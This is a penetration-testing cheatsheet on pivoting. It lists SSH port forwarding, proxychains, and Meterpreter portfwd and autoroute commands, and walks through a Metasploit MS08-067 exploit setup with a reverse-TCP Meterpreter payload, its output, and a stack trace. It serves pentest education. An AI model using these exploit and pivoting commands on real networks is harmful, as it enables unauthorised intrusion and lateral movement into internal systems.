What is Pivoting ?

Pivoting is a technique used to route traffic through a compromised host on a penetration test.

When conducting an external penetration test you may need to route traffic through a compromised machine in order to compromise internal targets.

Pivoting, allows you to leverage tools on your attacking machine while routing traffic through other hosts on the subnet, and potentially allowing access to other subnets.

SSH Pivoting Cheatsheet

SSH Port Forwarding

Command Description

ssh -L 9999:10.0.2.2:445 [email protected]

Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

Command Description

ssh -D 127.0.0.1:9050 [email protected]

Dynamically allows all port forwards to the subnets availble on the target.

Dynamic Proxychain Warning

Dynamic Proxychain SSH port forwarding does not work with nmap and metasploits meterpreter shells won't spawn.

If you attempt to spawn a shell via Meterpreter, you’ll get an error similar to the following:

meterpreter > execute -f cmd.exe -i -H
|S-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:41713-<--timeout

Using Proxychain port forwards

When using a Proxychain port forward, all commands need to be prefixed with the proxychain command, this instructs the application traffic to route through the proxy.

Connecting to RDP via Proxychains Dynamic Port Forwarding

root:~# proxychains rdesktop TARGET-IP

</p>

Configure Metasploit to use a SSH Pivot

The following is an example of how to configure Metersploit to use a SSH portward. In this example port 9999 is forwarded to the target and the attacking machine has an IP address of 192.168.2.100:

Setup the port forward (instructions above), then configure msfconsole as follows (using MS08_067 in this example).

 msf exploit(ms08_067_netapi) > show options

 Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
    RPORT    9999             yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


 Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
    LHOST     192.168.2.100   yes       The listen address
    LPORT     443              yes       The listen port


 Exploit target:

    Id  Name
    --  ----
   0   Automatic Targeting

Don’t use 127.0.0.1 with Metasploit

Update: You can now use 127.0.0.2

Other 127.0.0.0 addresses can also be used (127.0.0.3,127.0.0.4 etc), but not 127.0.0.1

The example above uses 0.0.0.0 Not 127.0.0.1, never use 127.0.0.1 with Metasploit or you’ll get the following error after you attempt to do anything post exploit:

 exploit(ms08_067_netapi) > exploit

 [*] Started reverse handler on 192.168.14.183:443
 [*] Automatically detecting the target...
 [*] Fingerprint: Windows XP - Service Pack 3 - lang:English
 [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
 [*] Attempting to trigger the vulnerability...
 [*] Sending stage (769536 bytes) to 192.168.15.252

msf meterpreter > getuid
 [-] Session manipulation failed: Validation failed: Address is reserved ["/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/validations.rb:56:in `save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/attribute_methods/dirty.rb:33:in `save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:264:in `block in save!'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:313:in `block in with_transaction_returning_status'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:208:in `transaction'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:311:in `with_transaction_returning_status'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/transactions.rb:264:in `save!'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:377:in `block in report_host'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/connection_pool.rb:129:in `with_connection'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:323:in `report_host'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:2031:in `block in report_event'", "/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/activerecord-3.2.17/lib/active_record/connection_adapters/abstract/connection_pool.rb:129:in `with_connection'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/db.rb:2025:in `report_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:222:in `report_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:331:in `session_event'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:408:in `block in on_session_output'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:407:in `each'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:407:in `on_session_output'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'", "/opt/metasploit/apps/pro/msf3/lib/msf/core/session_manager.rb:242:in `block in register'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:271:in `call'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in `unknown_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:190:in `call'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:190:in `run'", "/opt/metasploit/apps/pro/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/msf3/lib/msf/base/sessions/meterpreter.rb:396:in `_interact'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1745:in `cmd_sessions'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:142:in `cmd_exploit'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:200:in `run'", "/opt/metasploit/apps/pro/msf3/msfconsole:148:in `<main>'"]

Meterpreter Pivoting Cheatsheet

Assuming you’ve compromised the target machine and have a meterpreter shell, you can pivot through it by setting up a meterpreter port forward.

Command Description

portfwd add –l 3389 –p 3389 –r target-host

Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell

portfwd delete –l 3389 –p 3389 –r target-host

Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell

portfwd flush

Meterpreter delete all port forwards

portfwd list

Meterpreter list active port forwards

run autoroute -s 192.168.15.0/24

Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0

run autoroute -p

Meterpreter list all active routes

route

Meterpreter view available networks the compromised host can access

route add 192.168.14.0 255.255.255.0 3

Meterpreter add route for 192.168.14.0/24 via Session 3.

route delete 192.168.14.0 255.255.255.0 3

Meterpreter delete route for 192.168.14.0/24 via Session 3.

route flush

Meterpreter delete all routes

Meterpreter Port Forwards are flakey

Meterpreter port forwards can be a bit flakey, also the meterpreter session needs to be remain open.

In order to connect to the compromised machine you would run:

Connect to RDP via Meterpreter Port Forward

root:~# rdesktop 127.0.0.1

</p>

Pivoting Example Diagrams

Pivoting can be a bit hard to understand on paper, so here are some diagrams for clarification with the associated commands.

Brace for Wonky Visio Arrows

Starting Point

You’ll need to have access to a compromised machine on the target network, depending on the compromised machines configuration you may or may not need root.

SSH Pivot Example 1: Starting Point

Routing Traffic to the Same Subnet

Pivot Example 2: Routing traffic to the same subnet

####Example commands

SSH Pivoting using Proxychains

Dynamic SSH Pivoting Command using proxy chains

root:~# ssh -D 127.0.0.1:9050 [email protected]

</p>

You could then connect to Target 2’s RDP server using:

Connecting to RDP via Proxychains Dynamic Port Forwarding

root:~# proxychains rdesktop 192.168.2.3

</p>
SSH Port Forwarding Command

RDP SSH Port Forwarding

root:~# ssh -L 3389:192.168.2.3:3389 [email protected]

</p>

You could then connect to Target 2’s RDP server using:

Connecting to RDP via SSH Port Forwarding

root:~# rdesktop 127.0.0.1

</p>

SSH and Meterpreter Pivoting

This example uses SSH pivoting and Meterpreter port forwarding to access machines on subnet 2.

Pivot Example 3: Using SSH and Meterpreter Pivoting to access another subnet

Example commands

The above commands would be leveraged to reach Target 2, from Target 2 to Target 3, meterpreter would be used. Follow the meterpreter portwarding example above for a MS08-067 example.

If this was helpfull, click tweet below.

Enjoy.